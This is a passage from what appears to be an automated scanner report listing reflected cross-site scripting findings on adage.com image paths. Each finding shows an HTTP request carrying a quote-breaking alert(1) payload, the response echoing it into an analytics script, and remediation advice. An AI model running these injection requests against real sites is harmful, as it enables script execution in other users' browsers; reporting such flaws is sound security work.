The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1bba"-alert(1)-"239b8dd9444 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus/digital.pnge1bba"-alert(1)-"239b8dd9444?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=D076E2129A9E956908F653B920236415C6FB003A; path=/
Set-Cookie: HMAC=E5CFDE4A37905DACA1EDCAFD9CF6DC03887FAC0F; path=/
Set-Cookie: HMAC=EF563139F2002779F9301F48DD260EB3419A8190; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus/digital.pnge1bba"-alert(1)-"239b8dd9444"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.102. http://adage.com/images/bottom/menus/global_news.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/global_news.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1aa85"-alert(1)-"2668855e0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images1aa85"-alert(1)-"2668855e0e/bottom/menus/global_news.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=E4AAF4A24105EF9976F5A3CB2CA6478DF7F73ACE; path=/
Set-Cookie: HMAC=9E8F46A11AEA0DD6C1F6A05686F582AD4D4C7AA7; path=/
Set-Cookie: HMAC=E2652891D4C59D22C71EC1E05F652712C8C16514; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49470
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images1aa85"-alert(1)-"2668855e0e/bottom/menus/global_news.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!
...[SNIP]...

1.103. http://adage.com/images/bottom/menus/global_news.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/global_news.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f53d"-alert(1)-"6b94a11373c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom2f53d"-alert(1)-"6b94a11373c/menus/global_news.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=F8287ECCFD375686A0167E3DC63983221F10CDF7; path=/
Set-Cookie: HMAC=03E344AC8469B3883FD8BED55DC2AE335A7B29E5; path=/
Set-Cookie: HMAC=A6097E17E01C2A351D5B1F3A481A654CA44C0833; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49471
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom2f53d"-alert(1)-"6b94a11373c/menus/global_news.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.j
...[SNIP]...

1.104. http://adage.com/images/bottom/menus/global_news.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/global_news.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e821e"-alert(1)-"79ddf212f2d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menuse821e"-alert(1)-"79ddf212f2d/global_news.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=46BAE280CB02FD28AB4E1B0403F533F15D831E6D; path=/
Set-Cookie: HMAC=4D08DF71E0E17B8E91B33E6AA65ECD753B3B2F8E; path=/
Set-Cookie: HMAC=9A43240B092D1B6DB3E9C7D3AAF383A67F8AC63E; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49471
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menuse821e"-alert(1)-"79ddf212f2d/global_news.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hb
...[SNIP]...

1.105. http://adage.com/images/bottom/menus/global_news.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/global_news.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 858b7"-alert(1)-"bb05cec5b1e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus/global_news.png858b7"-alert(1)-"bb05cec5b1e?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=E091CAA4133BFDF794883A7501EEF019343F06FF; path=/
Set-Cookie: HMAC=8E85996781FF324B146FE5FBFD2404711A048B67; path=/
Set-Cookie: HMAC=04E199F5A8AF6D7BF213D8DFEED258A98723422C; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49471
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
in.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus/global_news.png858b7"-alert(1)-"bb05cec5b1e"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.106. http://adage.com/images/bottom/menus/hispanic_marketing.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/hispanic_marketing.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b52f8"-alert(1)-"3572e8d3978 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesb52f8"-alert(1)-"3572e8d3978/bottom/menus/hispanic_marketing.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=24D2B1E3D90B28A82716DC55500250D24CB6F499; path=/
Set-Cookie: HMAC=8A3CC21C1AD1FB733ACE62FD248C92CC86D72123; path=/
Set-Cookie: HMAC=413AD55B00244C69772F84E582F963DA6FDECFD1; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/imagesb52f8"-alert(1)-"3572e8d3978/bottom/menus/hispanic_marketing.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx
...[SNIP]...

1.107. http://adage.com/images/bottom/menus/hispanic_marketing.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/hispanic_marketing.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0678"-alert(1)-"3f00723c72b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottomb0678"-alert(1)-"3f00723c72b/menus/hispanic_marketing.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=2DFF7E94009EB90A67520654120A05D60E466602; path=/
Set-Cookie: HMAC=62095A3B6B3031DA40686DC4464EACA1296466A3; path=/
Set-Cookie: HMAC=41261E852028C84E2AF981022D3A38D82BBF5401; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottomb0678"-alert(1)-"3f00723c72b/menus/hispanic_marketing.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!
...[SNIP]...

1.108. http://adage.com/images/bottom/menus/hispanic_marketing.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/hispanic_marketing.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50e14"-alert(1)-"8f6132336dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus50e14"-alert(1)-"8f6132336dd/hispanic_marketing.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=AC1B6A7607937065F639263F49D9E4D3CCDAA014; path=/
Set-Cookie: HMAC=53908E792419BE4154F7B15751D787CD12D5DA0D; path=/
Set-Cookie: HMAC=F97E96E75990B86301022B079C7FC743E451E41F; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus50e14"-alert(1)-"8f6132336dd/hispanic_marketing.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.
...[SNIP]...

1.109. http://adage.com/images/bottom/menus/hispanic_marketing.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/hispanic_marketing.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a321c"-alert(1)-"985e8bfe21e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus/hispanic_marketing.pnga321c"-alert(1)-"985e8bfe21e?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=49BBCF2C2EEE6DB1A9661673D8310C29A3F07F16; path=/
Set-Cookie: HMAC=B966704E0076706227F9E418D6EAE14880ECFFEB; path=/
Set-Cookie: HMAC=671E5066F4B29817F92458DDAB2052827C6065FF; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus/hispanic_marketing.pnga321c"-alert(1)-"985e8bfe21e"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.110. http://adage.com/images/bottom/menus/housing.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/housing.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90478"-alert(1)-"a4ab2d20d6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images90478"-alert(1)-"a4ab2d20d6c/bottom/menus/housing.png?1311609254 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=BB58AC18711636FE82F375A58C6F69EA32DA5CFA; path=/
Set-Cookie: HMAC=A74F0A4A1CF561C7FFA63A60361DC2A08477B328; path=/
Set-Cookie: HMAC=494E0E53AE2BFA3D88F95ED5D0263904EA968ECC; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1311609254";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images90478"-alert(1)-"a4ab2d20d6c/bottom/menus/housing.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms
...[SNIP]...

1.111. http://adage.com/images/bottom/menus/housing.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/housing.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19038"-alert(1)-"34eeeccf4f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom19038"-alert(1)-"34eeeccf4f1/menus/housing.png?1311609254 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=BCCA82AECC50E38726109B077DC2398144C33DD3; path=/
Set-Cookie: HMAC=D417A05EBE9AA0550B6792126A63CC1DE9952992; path=/
Set-Cookie: HMAC=6199D14071FBC72E13BEF195546069776B73BD64; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
